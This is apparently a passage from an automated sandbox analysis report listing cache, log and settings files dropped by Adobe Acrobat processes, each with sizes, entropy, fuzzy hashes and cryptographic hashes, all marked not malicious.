File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08230096917654028 |
Encrypted: | false |
SSDEEP: | 3:N8KYem3gyg1t/57Dek3JOWlVqt/ollEqW3l/TjzzQ/t:KKz0gzHR3tOEYtAmd8/ |
MD5: | 2838BC1F648AD68B204C5B7DC9A5436E |
SHA1: | DF58B121FC25866301C8CC4E72DD76F255D1EADF |
SHA-256: | 58641018C33B25ADEA97F2DAB7416E6B9830B07AAD09F183DB4C163753FDA95C |
SHA-512: | 745383B5FB5CA8812559DA68A24228A4AD1774C359FEDC662C5375DEFC80979AB211CD2B0E95DAFCD27C25E9D596E3A49F176C22D4615E8BF68A1D204006585A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.220389843757165 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQHAGjL+q2PcNwi2nKuAl9OmbnIFUtSDfQc2o1ZmwsDfQhfLVkwOcNwi2nKZ:7Ef8jL+vLZHAahFUtCfD/YfufLV54ZHi |
MD5: | 0E329F23AC023E6D53C14131197187B7 |
SHA1: | 217AF210B79465CCE17B1380B146C40FF5F213FE |
SHA-256: | 31A7BDD27C481C3AFA60416E3A6230028F1D76E5A02AAE74FDA9119D6F87B26A |
SHA-512: | 7EC12AC892CCD0AE69168FB9056B7D34168E4FD627B2C9AA4CC8E9E54D5FF638EEE02477F8DE3D2AFD708BD5FFB4328AA66CD5AE292ED33C3475515BA15C1AAE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.220389843757165 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQHAGjL+q2PcNwi2nKuAl9OmbnIFUtSDfQc2o1ZmwsDfQhfLVkwOcNwi2nKZ:7Ef8jL+vLZHAahFUtCfD/YfufLV54ZHi |
MD5: | 0E329F23AC023E6D53C14131197187B7 |
SHA1: | 217AF210B79465CCE17B1380B146C40FF5F213FE |
SHA-256: | 31A7BDD27C481C3AFA60416E3A6230028F1D76E5A02AAE74FDA9119D6F87B26A |
SHA-512: | 7EC12AC892CCD0AE69168FB9056B7D34168E4FD627B2C9AA4CC8E9E54D5FF638EEE02477F8DE3D2AFD708BD5FFB4328AA66CD5AE292ED33C3475515BA15C1AAE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.191241076031514 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQo02yq2PcNwi2nKuAl9Ombzo2jMGIFUtSDfQqyz1ZmwsDfQqylRkwOcNwiV:7EfH02yvLZHAa8uFUtCfg/YfQR54ZHAv |
MD5: | EC61D363178464B0074FF4CD522589C6 |
SHA1: | 6173054D9E8038F7BBFE76BC2B76BD3D06CF4F89 |
SHA-256: | BE1A0A7AD684A62A5329EF63717E3A6C702C591181312A9C10493EE2601F47D8 |
SHA-512: | 809A8A3219456E1E1EE17718C807E14B8160F0AC5D36AA420F997109CBAC64310B7B39AC3CCFFB8CA9F46A2FF2C2006FDD66BE3BFECBC9B3BFEEE1D04518C494 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.191241076031514 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQo02yq2PcNwi2nKuAl9Ombzo2jMGIFUtSDfQqyz1ZmwsDfQqylRkwOcNwiV:7EfH02yvLZHAa8uFUtCfg/YfQR54ZHAv |
MD5: | EC61D363178464B0074FF4CD522589C6 |
SHA1: | 6173054D9E8038F7BBFE76BC2B76BD3D06CF4F89 |
SHA-256: | BE1A0A7AD684A62A5329EF63717E3A6C702C591181312A9C10493EE2601F47D8 |
SHA-512: | 809A8A3219456E1E1EE17718C807E14B8160F0AC5D36AA420F997109CBAC64310B7B39AC3CCFFB8CA9F46A2FF2C2006FDD66BE3BFECBC9B3BFEEE1D04518C494 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\16eb408a-72cb-4252-9691-c61112b94f6a.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.95164241069027 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPrsBdOg2Hhcaq3QYiubSpDyP7E4T3y:Y2sRdsZdMHY3QYhbSpDa7nby |
MD5: | 35CD2E5CFE756153CB3A79328A28CCEE |
SHA1: | CE857878B4F560CAE59F12FE7F25347FEE30DB6B |
SHA-256: | 4248088E72B820122B5E816211A2AE72C792ACD95310B576AC07517FDF108CF6 |
SHA-512: | 463FE0F29EF6E14B6CD8CDFF18C4FA4C188A5C0EF11BC23435762019F6FC29D3051BEBE28CD758AF179E8FA60129A852FF163C4B56B9D597FB10060F5A5DD2AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF439005.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d243daeb-2b6c-44f9-8e94-1678d97c1986.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.234396089376825 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP7zbWKHa:CwNw1GHqPySfkcigoO3h28ytPzWKHa |
MD5: | AED9AF7C87BF9C9AF4819D7A61C9E9AA |
SHA1: | B946A32824DAB56D78FB11CF1D32EC32263FD22B |
SHA-256: | EC46C12F5D239CA953FD8C47FC3C07D85F97E122978D7BBCF9416CD8B205FB0B |
SHA-512: | 1A7B824D601E0066F45D0730DF602B41D4FDAB83416331E126B08F50439E1A41A8434518F8D17EA956AE6D3058453C2522A9C0491B0BF43231AA8587113E725B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.231616536838622 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQXLAEyq2PcNwi2nKuAl9OmbzNMxIFUtSDfQXLCnz1ZmwsDfQXLC0GjRkwOh:7EfrEyvLZHAa8jFUtCfNZ/YfPR54ZHAo |
MD5: | 5F22A2FD68B431EA460B1B424CD096AC |
SHA1: | 1B1E867E26CD865279871544218F890A4925F2FD |
SHA-256: | 4627E7EDC00091E108FF054F5853CD9774B42004D930FCDC886E791FE649FB71 |
SHA-512: | 2FADE9E259C4F34435E4547ACB3EF3BB119B6D14656E1A64C378E31E6F2643F59392D358E0600F9DD2D112A330BDD91262EEAEAE36B11C75F7CD2BD50CEE3505 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.231616536838622 |
Encrypted: | false |
SSDEEP: | 6:iO4DfQXLAEyq2PcNwi2nKuAl9OmbzNMxIFUtSDfQXLCnz1ZmwsDfQXLC0GjRkwOh:7EfrEyvLZHAa8jFUtCfNZ/YfPR54ZHAo |
MD5: | 5F22A2FD68B431EA460B1B424CD096AC |
SHA1: | 1B1E867E26CD865279871544218F890A4925F2FD |
SHA-256: | 4627E7EDC00091E108FF054F5853CD9774B42004D930FCDC886E791FE649FB71 |
SHA-512: | 2FADE9E259C4F34435E4547ACB3EF3BB119B6D14656E1A64C378E31E6F2643F59392D358E0600F9DD2D112A330BDD91262EEAEAE36B11C75F7CD2BD50CEE3505 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438723362202332 |
Encrypted: | false |
SSDEEP: | 384:Se5ci5GIiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:ekurVgazUpUTTGt |
MD5: | EC681DC096DF21D2770AA22959D2EF58 |
SHA1: | D50BFA01DE0DDB9045E22D17CFD3B868B7AE0212 |
SHA-256: | 7072310E6DEB5384EE757376A05C5BC1D08996EE9290399F5F558F7F7565AF03 |
SHA-512: | 295B6CE5C46481F81613EBAA34D8F3A1E13D545D609E831C02B7DB5F609E16FEE36E4659DEC91C49CD048B7A2665DE203522BA0CF507CF9BE0008DE542475B16 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.217227992399084 |
Encrypted: | false |
SSDEEP: | 24:7+tE/6wKFqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MzR:7MgWFqvmFTIF3XmHjBoGGR+jMz+LhU |
MD5: | 366CCCE403C6392FCC1033A6F01A94C8 |
SHA1: | 235C86684CB49F6D09CCA199572F4398C8182FBC |
SHA-256: | 2D1690251C831DB11ACC6646FBAB9D1B99B2E22F0DD18546F615854C33B1BBC4 |
SHA-512: | 66C042E5D46FDC6A902117937364977C6FAA64761325A35E0857ED89EB6566709E2AE827B88C5A06295E5F44EC2330748BACF1E94B6EE789D44F860100639037 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7217198674325385 |
Encrypted: | false |
SSDEEP: | 3:kkFkldG6stfllXlE/HT8knZhl/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKvHeT8ufVNMa8RdWBwRd |
MD5: | 2A89F3B810A3747D26C0ECBC72C9A7B2 |
SHA1: | B7DA6B65EB0DCDD0FCB0FB6C64642AAC73FBFF02 |
SHA-256: | 3586E04183B5EF7DACA07D6A456224711BBBA46B7845E6A197C0EDF9E58B2995 |
SHA-512: | CF8EF72E23B4B3AFE0258C7BA8BB8277C3F93888ECF2A70AA8E0E314F49CD321826600FE52C854134CAA032E9EDFBEF22AECBF52E9CCC6D20BA56B6F9DFAAA1C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKdiWtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1/tiDImsLNkPlE99SNxAhUe/3 |
MD5: | 5CFF754CEAC268F71B30DA4D0E08F190 |
SHA1: | 4A1D7445697F16B3F30FC19156752B8E7E3DBCE6 |
SHA-256: | 5BBC80F3368E455E49875CEE0F2F7B0F1E339C583B5929CF416D7DED95DC284E |
SHA-512: | 16444626E19D1425F1D7625BE3802EDDAF8EC9B66FAC916944C71988B01B7880EE511683D42656D6180452B9D50C305F23129A2809AEE92ADD18DF079D24EA58 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3585318075044315 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJM3g98kUwPeUkwRe9:YvXKXaKhgsdTeO6AWksGMbLUkee9 |
MD5: | 8BC488171EF749564621E1EFADF35828 |
SHA1: | CC0FF05B28E4F6455E8CFA8BFDB316AAE3ABC8CB |
SHA-256: | 1C875BDD8A5AE12472AFD40229D4F3356332427262E5E27FB2B1A9DB9C7E6149 |
SHA-512: | ED30C68C831702D9E776365DC5D42454EB0DC88D6154525EFE665D115FE1E81E6374BB6B7D61D7BBF1258DB2FBF32A488945A3D00D649BC8A4CF920493D82D92 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.294264958221137 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfBoTfXpnrPeUkwRe9:YvXKXaKhgsdTeO6AWksGWTfXcUkee9 |
MD5: | 617ED5C19CB20014C38566DCA38CD2AA |
SHA1: | 0BC1AEFFA5C05264CB20B0F3BD19A7FB79C0354C |
SHA-256: | 0400B14492251255813C73759500AB908D3E47460BBDACC0FF3D183A6AFCC23A |
SHA-512: | 4C9AE4926D79BF250A0D296B4C50ACC19B5123C4888798784BB4E04D7607DBDF4627648040E66CBB10654D890DA5A199B4FA76432D1A5D1E889B35D284AE9B1A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.272115051798207 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfBD2G6UpnrPeUkwRe9:YvXKXaKhgsdTeO6AWksGR22cUkee9 |
MD5: | 556E9580FD13AEEE98F2CF0FBD5518BD |
SHA1: | 3BE66F94CAB95A9ED41D678F26976237ACF9409A |
SHA-256: | 84B81B7499FD27A0D8AD77A515935AC4FA9E743FDA95396BEAAA36BC38E10922 |
SHA-512: | 989A031472201731C08195A3059C579B1AAB92E1B92AE76438F4A4013069857CA420B801C7A9C68BAE8575E2A978A9D2A5DB4BC9027121ABFA3881D3B9EC47A6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.345240581578098 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfPmwrPeUkwRe9:YvXKXaKhgsdTeO6AWksGH56Ukee9 |
MD5: | 80F3655A65DD75AB85325F4BD412EAD3 |
SHA1: | E53903F273BBA35947722C443825C27B312359E2 |
SHA-256: | 9AE90DF1415DC143C45D5A3D0550DB493BC5C93ABD31F855F82250B5E19B5F01 |
SHA-512: | 6655125FD959683A0C91153E8D50C74461C44A1FCD2C09E95A5D445F88C0FD168AA11EE1B780A6D3ACE0A6DE36E333530713582169DA151BDB43531413A87332 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.692334358400779 |
Encrypted: | false |
SSDEEP: | 24:Yv6X7OmeO6gJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSX:YvceHgJhgy6SAFv5Ah8cv/X |
MD5: | 3FF347B3952DD7BCEEBB09165832C2AF |
SHA1: | ECC27C3343AA518AD704F062E585D39823919D11 |
SHA-256: | ACA3B5B6F19ED55147CCC5356AC47DD05C4FD58FB352A31C065D6F0091F04B26 |
SHA-512: | FF22A20D8EF7F26DA58585DFE80FFB824EFACDAD732BC45C729E8BB28A69C45ED5691AEEE35DE7D08A0E9E4776AAA3BEDBF16B159B3B1B93ECF300E1E4B80368 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2826854277274675 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJf8dPeUkwRe9:YvXKXaKhgsdTeO6AWksGU8Ukee9 |
MD5: | 0B0464D9389FE4CBC35A84DEA960B6DE |
SHA1: | C31DE226CB86EAA346F40474A688D2CCFF1ACB48 |
SHA-256: | B16981EC6FBD34A1C32F8D83A7C3AB178CC999F5A949CB55A68C568B3212CCC4 |
SHA-512: | B0A51E091660FF44AF2D4057201143A4536A48C9B62A5B5B0DDAC53BA38CDC4B2330D2359110D03276449E8D4EFB6C94F4FA3D277FA07DEF43DAF0457E6139E7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.287054752188336 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfQ1rPeUkwRe9:YvXKXaKhgsdTeO6AWksGY16Ukee9 |
MD5: | 5BA4AE156F73940F8995E20845FB2924 |
SHA1: | 2FF8BC9B31671D5E332060BB41C79B85E4B4039B |
SHA-256: | 616AFDCFA9E10B473B7E07315E8E49547579F9BD3BF1E048556C8DAC02ABF64E |
SHA-512: | 541EFC3D7F3588ACB3989A638112FE7D7A5857E6807E2E5FEA77573876B802442BAD406AA78518DC25DA3F58D117B8B4160123BD9CB5BCE1ED1C6B598D22A2D2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.303606250098054 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfFldPeUkwRe9:YvXKXaKhgsdTeO6AWksGz8Ukee9 |
MD5: | A87FB597D21D049497B02F0924B3A45B |
SHA1: | 70188AEF39506CEBDA744771F7D6D95959FA4936 |
SHA-256: | 5980D9BA1FCF9D987D6740A0C1554E2EF8D03BF36737B68899CB0D772D3A0717 |
SHA-512: | F8561B7AF2D9297FA39233B44ACF1234054D43C11D6D3E6FB054769E54D7B1BD49D7B0F380F17BC0AFE08D72B489A110131DBB630ABB8C04FE87BB68B9AD9921 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.309902690467943 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfzdPeUkwRe9:YvXKXaKhgsdTeO6AWksGb8Ukee9 |
MD5: | D3189D59C320EB05134799D8843374FC |
